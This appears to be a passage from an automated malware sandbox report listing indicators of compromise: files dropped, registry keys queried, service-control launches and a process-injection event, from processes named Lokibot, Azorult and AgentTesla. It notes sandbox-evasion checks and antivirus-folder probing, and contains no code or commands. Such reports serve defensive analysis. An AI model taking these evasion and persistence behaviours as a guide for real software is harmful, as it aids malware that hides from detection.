File created	C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_84ea762c0a90c362\mshdc.PNF	CCleaner64.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	KtercHi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	KtercHi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	KtercHi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	KtercHi.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	KtercHi.exe
File created	C:\Windows\System32\DriverStore\FileRepository\hdaudbus.inf_amd64_8207ba80cf22e40a\hdaudbus.PNF	CCleaner64.exe
File opened for modification	C:\Windows\System32\GroupPolicy	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	KtercHi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15	KtercHi.exe
File created	C:\Windows\System32\DriverStore\FileRepository\monitor.inf_amd64_5653ba7de4b18c6f\monitor.PNF	CCleaner64.exe
File created	C:\Windows\System32\DriverStore\FileRepository\swenum.inf_amd64_3bf6c0d173eb26c6\swenum.PNF	CCleaner64.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	KtercHi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	KtercHi.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\addinutil.exe.log	CCleaner64.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\System32\DriverStore\FileRepository\cdrom.inf_amd64_b9219faf432b1e25\cdrom.PNF	CCleaner64.exe
File created	C:\Windows\System32\DriverStore\FileRepository\msmouse.inf_amd64_5ab7d1c25144fcab\msmouse.PNF	CCleaner64.exe
File created	C:\Windows\System32\DriverStore\FileRepository\umbus.inf_amd64_0a89aff902a5c3a9\umbus.PNF	CCleaner64.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	CCleaner64.exe
File created	C:\Windows\System32\DriverStore\FileRepository\usbport.inf_amd64_585900615f764770\usbport.PNF	CCleaner64.exe
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF	CCleaner64.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	HvMFTkC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	KtercHi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	KtercHi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	KtercHi.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4076 set thread context of 4956	4076	Lokibot.exe	675

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Panda Security	Azorult.exe
File created	C:\Program Files\CCleaner\Lang\lang-1035.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\Lang\lang-1037.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\Lang\lang-1155.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\CCleanerDU.dll	ccsetup622.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	Azorult.exe
File created	C:\Program Files\CCleaner\Lang\lang-1044.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\Lang\lang-2070.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\LOG\burger_client\8866F8A9-70C9-43A2-BFBE-EE00AA2DC417\7db038e8-77e5-42a1-bdee-fdf778911793	CCleaner64.exe
File created	C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.dll	AgentTesla.exe
File opened for modification	C:\Program Files\AVG	Azorult.exe
File opened for modification	C:\Program Files\CCleaner\Data\StateHistory\InitialDUState V23_4.dat	CCleaner64.exe
File created	C:\Program Files (x86)\Briano\UWPHook\Microsoft.Management.Infrastructure.dll	AgentTesla.exe
File opened for modification	C:\Program Files (x86)\Zaxar	Azorult.exe
File opened for modification	C:\Program Files\SpyHunter	Azorult.exe
File opened for modification	C:\Program Files\Kaspersky Lab	Azorult.exe
File opened for modification	C:\Program Files\CCleaner\LOG\burger_client\8866F8A9-70C9-43A2-BFBE-EE00AA2DC417\c21a0a8d-69f0-4793-a339-f2a2cc3ed602	CCleaner64.exe
File created	C:\Program Files\CCleaner\LOG\burger_client\8866F8A9-70C9-43A2-BFBE-EE00AA2DC417\b7824506-e19b-485a-b353-729e52384e9e	CCleaner64.exe
File created	C:\Program Files\CCleaner\Lang\lang-1049.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\Lang\lang-1052.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\Lang\lang-1057.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\Lang\lang-1062.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\LOG\event_manager.log.tmp.e5eaf01f-7593-4bf6-8c2f-7ae986050811	CCleaner64.exe
File created	C:\Program Files\CCleaner\Lang\lang-2074.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\libwaheap.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\CCleanerReactivator.exe	ccsetup622.exe
File created	C:\Program Files\CCleaner\Lang\lang-1027.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\Lang\lang-1043.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\Lang\lang-1054.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\Lang\lang-1071.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\Lang\lang-1093.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\Data\StateHistory\DUState 2024-04-15 19-55-36-902.dat	CCleaner64.exe
File opened for modification	C:\Program Files (x86)\Cezurity	Azorult.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe
File created	C:\Program Files (x86)\FzpuedLTU\YQUFrgK.xml	KtercHi.exe
File created	C:\Program Files\CCleaner\Lang\lang-1058.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\CCleanerPerformanceOptimizer.dll	ccsetup622.exe
File opened for modification	C:\Program Files\CCleaner	CCleaner64.exe
File created	C:\Program Files\CCleaner\Data\state_cache.json.{CBDF1F82-D4AE-4945-AE7C-0EC90188A899}	CCleaner64.exe
File opened for modification	C:\Program Files (x86)\Butterfly on Desktop\unins000.dat	butterflyondesktop (1).tmp
File created	C:\Program Files (x86)\Butterfly on Desktop\is-IJI53.tmp	butterflyondesktop (1).tmp
File created	C:\Program Files\WProxy\WinProxy\pawns-sdk.dll	KPeVsWkf.exe
File created	C:\Program Files\CCleaner\Lang\lang-1029.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\Lang\lang-1050.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\libwavmodapi.dll	ccsetup622.exe
File opened for modification	C:\Program Files\CCleaner\LOG\event_manager.log	CCleaner64.exe
File created	C:\Program Files\CCleaner\Data\burger_client\8866F8A9-70C9-43A2-BFBE-EE00AA2DC417\bfed0d52-6596-4a7e-9324-b1e88cd6904a	CCleaner64.exe
File created	C:\Program Files\CCleaner\wa_3rd_party_host_64.exe	ccsetup622.exe
File created	C:\Program Files\CCleaner\LOG\burger_client\8866F8A9-70C9-43A2-BFBE-EE00AA2DC417\c21a0a8d-69f0-4793-a339-f2a2cc3ed602	CCleaner64.exe
File opened for modification	C:\Program Files\CCleaner\LOG\burger_client\8866F8A9-70C9-43A2-BFBE-EE00AA2DC417\7db038e8-77e5-42a1-bdee-fdf778911793	CCleaner64.exe
File created	C:\Program Files (x86)\Briano\UWPHook\MaterialDesignColors.dll	AgentTesla.exe
File opened for modification	C:\Program Files\CCleaner	CCleaner64.exe
File opened for modification	C:\Program Files\CCleaner\Data\StateHistory\DUState 2024-04-15 19-55-36-902.dat	CCleaner64.exe
File created	C:\Program Files\CCleaner\LOG\su_adapter.log.tmp.733065e1-c300-48bd-a673-510dab99686b	CCleaner64.exe
File created	C:\Program Files\CCleaner\CCleaner.exe	ccsetup622.exe
File created	C:\Program Files\CCleaner\Lang\lang-1066.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\Lang\lang-1067.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\Lang\lang-1086.dll	ccsetup622.exe
File created	C:\Program Files\CCleaner\Lang\lang-1087.dll	ccsetup622.exe
File opened for modification	C:\Program Files\Common Files\McAfee	Azorult.exe
File created	C:\Program Files\CCleaner\CCleanerBugReport.exe	ccsetup622.exe
File created	C:\Program Files\CCleaner\gcapi_dll.dll	CCleaner64.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	KtercHi.exe
File created	C:\Program Files (x86)\OeaNvgPtnMbXNNRkVbR\hVlUPOf.xml	KtercHi.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Tasks\CCleanerCrashReporting.job	CCleaner64.exe
File opened for modification	C:\Windows\lsasetup.log	CCleaner64.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	CCleaner64.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb00003.log	CCleaner64.exe
File opened for modification	C:\Windows\SystemTemp	Snetchball.exe
File opened for modification	C:\Windows\SystemTemp	Snetchball.exe
File opened for modification	C:\Windows\setuperr.log	CCleaner64.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.log	CCleaner64.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	CCleaner64.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb00008.log	CCleaner64.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb0000C.log	CCleaner64.exe
File created	C:\Windows\Tasks\UtYEUTeMbpvFAhQGa.job	schtasks.exe
File opened for modification	C:\Windows\SystemTemp	Snetchball.exe
File opened for modification	C:\Windows\SystemTemp	Process not Found
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	CCleaner64.exe
File opened for modification	C:\Windows\SystemTemp	Snetchball.exe
File opened for modification	C:\Windows\SystemTemp	Process not Found
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb00006.log	CCleaner64.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb00007.log	CCleaner64.exe
File opened for modification	C:\Windows\SystemTemp	Snetchball.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	CCleaner64.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb0000B.log	CCleaner64.exe
File created	C:\Windows\Tasks\wqpeDKIFfvabWBG.job	schtasks.exe
File created	C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping3332_1290271763\_platform_specific\win_x86\widevinecdm.dll.sig	Process not Found
File created	C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping3332_1290271763\manifest.json	Process not Found
File created	C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping3332_1290271763\_metadata\verified_contents.json	Process not Found
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	CCleaner64.exe
File created	C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping3332_1290271763\_platform_specific\win_x86\widevinecdm.dll	Process not Found
File opened for modification	C:\Windows\DtcInstall.log	CCleaner64.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	CCleaner64.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	CCleaner64.exe
File opened for modification	C:\Windows\SystemTemp	Process not Found
File opened for modification	C:\Windows\Panther\setupact.log	CCleaner64.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edbtmp.log	CCleaner64.exe
File opened for modification	C:\Windows\SystemTemp	Snetchball.exe
File opened for modification	C:\Windows\SystemTemp	Snetchball.exe
File opened for modification	C:\Windows\Debug\PASSWD.LOG	CCleaner64.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	CCleaner64.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ngen.log	CCleaner64.exe
File opened for modification	C:\Windows\Panther\setuperr.log	CCleaner64.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb00002.log	CCleaner64.exe
File opened for modification	C:\Windows\SystemTemp	Snetchball.exe
File opened for modification	C:\Windows\setupact.log	CCleaner64.exe
File opened for modification	C:\Windows\Debug\sammui.log	CCleaner64.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb00004.log	CCleaner64.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb0000A.log	CCleaner64.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb0000E.log	CCleaner64.exe
File opened for modification	C:\Windows\security\logs\scesetup.log	CCleaner64.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.log	CCleaner64.exe
File opened for modification	C:\Windows\Debug\PASSWD.LOG	CCleaner64.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb00005.log	CCleaner64.exe
File created	C:\Windows\Tasks\bUgrpDbixCAhXFfIKo.job	schtasks.exe
File opened for modification	C:\Windows\SystemTemp	Snetchball.exe
File opened for modification	C:\Windows\SystemTemp	Process not Found
File opened for modification	C:\Windows\Logs\MoSetup\UpdateAgent.log	CCleaner64.exe
File created	C:\Windows\Tasks\YvkvJxjCeChtPIXLC.job	schtasks.exe
File created	C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping3332_1290271763\LICENSE	Process not Found
File created	C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping3332_1290271763\manifest.fingerprint	Process not Found
File opened for modification	C:\Windows\WindowsUpdate.log	CCleaner64.exe
File opened for modification	C:\Windows\Debug\NetSetup.LOG	CCleaner64.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb00009.log	CCleaner64.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb0000D.log	CCleaner64.exe
File opened for modification	C:\Windows\SystemTemp	Snetchball.exe
File opened for modification	C:\Windows\SystemTemp	Snetchball.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
892	sc.exe
2164	sc.exe
4492	sc.exe
3068	sc.exe
4376	sc.exe
5732	sc.exe
1824	sc.exe
6056	sc.exe
3420	sc.exe
1040	sc.exe
1308	sc.exe
5188	sc.exe
2620	sc.exe
3552	sc.exe
1772	sc.exe
2360	sc.exe
1932	sc.exe
4404	sc.exe
4664	sc.exe
2712	sc.exe
5332	sc.exe
1488	sc.exe
4388	sc.exe
2424	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 48 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Driver	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\LocationInformation	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Driver	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0003\	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	Snetchball.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceType	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceType	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0003	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	Snetchball.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	Snetchball.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0003\	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	Snetchball.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	Snetchball.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0003	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LocationInformation	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	Snetchball.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	Snetchball.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	Snetchball.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	Process not Found

Checks processor information in registry 2 TTPs 29 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ccsetup622.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	ccsetup622.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	CCleanerPerformanceOptimizerService.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	CCleaner64.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	CCleanerPerformanceOptimizerService.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	ccsetup622.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	CCleanerPerformanceOptimizerService.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	CCleanerPerformanceOptimizerService.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	CCleanerPerformanceOptimizerService.exe

Creates scheduled task(s) 1 TTPs 16 IoCs

